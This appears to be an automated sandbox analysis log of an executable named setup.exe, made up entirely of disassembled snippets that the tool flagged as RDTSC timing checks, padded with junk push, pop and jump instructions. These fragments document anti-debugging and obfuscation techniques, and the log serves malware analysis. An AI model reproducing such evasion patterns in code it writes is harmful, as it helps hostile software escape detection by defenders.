Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40AEE9 second address: 40AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 409FD2 second address: 409FEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 409FEC second address: 409FFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F47D8E3B0A6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 409FFB second address: 40A001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40A001 second address: 40A01E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push ecx 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E3B0AFh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40A199 second address: 40A1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 pushad 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F47D8E48278h 0x0000000f pop edx 0x00000010 jnc 00007F47D8E48268h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40A1CA second address: 40A1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40E420 second address: 40E46F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push edi 0x00000008 jmp 00007F47D8E48274h 0x0000000d pop edi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jns 00007F47D8E4826Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F47D8E48270h 0x0000001e push ebx 0x0000001f pop ebx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40E5BC second address: 40E5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40E5C6 second address: 40E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F47D8E48266h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 40EA1B second address: 40EA27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F47D8E3B0A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4123D2 second address: 4123DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 412825 second address: 412852 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E3B0ACh 0x00000008 jp 00007F47D8E3B0A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jnp 00007F47D8E3B0B9h 0x00000017 jmp 00007F47D8E3B0B1h 0x0000001c pushad 0x0000001d popad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 412852 second address: 412858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4129B1 second address: 4129C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47D8E3B0B0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4129C9 second address: 4129DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A18C second address: 41A1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0B3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A34B second address: 41A34F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A34F second address: 41A371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F47D8E3B0A6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A371 second address: 41A377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A377 second address: 41A37C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A4E5 second address: 41A4F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007F47D8E48266h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41A4F5 second address: 41A4F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41AB34 second address: 41AB44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jns 00007F47D8E48266h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B3CC second address: 41B3E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B998 second address: 41B99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B99D second address: 41B9A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41B9A3 second address: 41B9A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC2A second address: 41BC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC30 second address: 41BC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC34 second address: 41BC62 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e jbe 00007F47D8E3B0A6h 0x00000014 ja 00007F47D8E3B0A6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 41BC62 second address: 41BC68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42011D second address: 420133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420133 second address: 420142 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F47D8E48266h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420142 second address: 42014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42014D second address: 420151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420151 second address: 420170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F47D8E3B0B6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420170 second address: 420176 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420176 second address: 42017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420538 second address: 42053C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42067F second address: 420685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420685 second address: 42068B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42068B second address: 420690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420690 second address: 420695 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420695 second address: 4206A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4206A0 second address: 4206CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48276h 0x00000009 pop esi 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop edx 0x0000000e push edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 jc 00007F47D8E4826Eh 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420837 second address: 42084F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F47D8E3B0B2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42084F second address: 420854 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420854 second address: 420869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F47D8E3B0ACh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420869 second address: 420886 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47D8E48266h 0x00000008 jc 00007F47D8E48266h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 jns 00007F47D8E48266h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420886 second address: 420890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420890 second address: 4208A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4209D2 second address: 4209D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 420B0A second address: 420B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F47D8E48270h 0x0000000d ja 00007F47D8E48266h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42DC20 second address: 42DC3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F47D8E3B0B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42DC3D second address: 42DC46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42BD80 second address: 42BDE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F47D8E3B0ABh 0x0000000a jmp 00007F47D8E3B0B3h 0x0000000f popad 0x00000010 jmp 00007F47D8E3B0B5h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push ecx 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop ecx 0x0000001c je 00007F47D8E3B0BFh 0x00000022 jmp 00007F47D8E3B0B9h 0x00000027 jnc 00007F47D8E3B0AEh 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42BF58 second address: 42BF5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C542 second address: 42C557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007F47D8E3B0AEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C557 second address: 42C573 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48276h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C879 second address: 42C87D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42C87D second address: 42C885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42CC6A second address: 42CC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jnl 00007F47D8E3B0AEh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 42D366 second address: 42D36B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 441BF2 second address: 441BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 378650 second address: 378654 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4417BA second address: 4417BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4417BF second address: 4417C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 447087 second address: 44708B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 44708B second address: 4470AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47D8E48271h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F47D8E48268h 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D19 second address: 446D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D1D second address: 446D42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F47D8E48274h 0x0000000e jg 00007F47D8E48266h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D42 second address: 446D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 446D48 second address: 446D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F47D8E48266h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 44D5B2 second address: 44D5BC instructions: 0x00000000 rdtsc 0x00000002 jno 00007F47D8E3B0A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 453BDD second address: 453BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F201C9 second address: 4F201CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F201CF second address: 4F201E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ADh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40011 second address: 4F40021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40021 second address: 4F40057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a mov ch, 41h 0x0000000c jmp 00007F47D8E3B0AFh 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F47D8E3B0B5h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40057 second address: 4F40067 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40067 second address: 4F4007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47D8E3B0AAh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4007D second address: 4F40083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40083 second address: 4F40129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 pushad 0x0000000a push esi 0x0000000b movsx edx, si 0x0000000e pop eax 0x0000000f call 00007F47D8E3B0ADh 0x00000014 jmp 00007F47D8E3B0B0h 0x00000019 pop eax 0x0000001a popad 0x0000001b mov dword ptr [esp], ecx 0x0000001e jmp 00007F47D8E3B0B1h 0x00000023 mov eax, dword ptr [774365FCh] 0x00000028 pushad 0x00000029 jmp 00007F47D8E3B0ACh 0x0000002e pushfd 0x0000002f jmp 00007F47D8E3B0B2h 0x00000034 and eax, 00816F08h 0x0000003a jmp 00007F47D8E3B0ABh 0x0000003f popfd 0x00000040 popad 0x00000041 test eax, eax 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 call 00007F47D8E3B0ABh 0x0000004b pop ecx 0x0000004c call 00007F47D8E3B0B9h 0x00000051 pop ecx 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40129 second address: 4F4013A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4013A second address: 4F4013E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4013E second address: 4F40159 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F484B2BBA86h 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 popad 0x00000013 mov ecx, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40159 second address: 4F40176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F40285 second address: 4F4028B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F4028B second address: 4F402AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, dx 0x00000006 mov si, bx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F47D8E3B0ABh 0x00000013 pop ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402AB second address: 4F402AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402AF second address: 4F402B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402B5 second address: 4F402BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4F402BB second address: 4F402BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
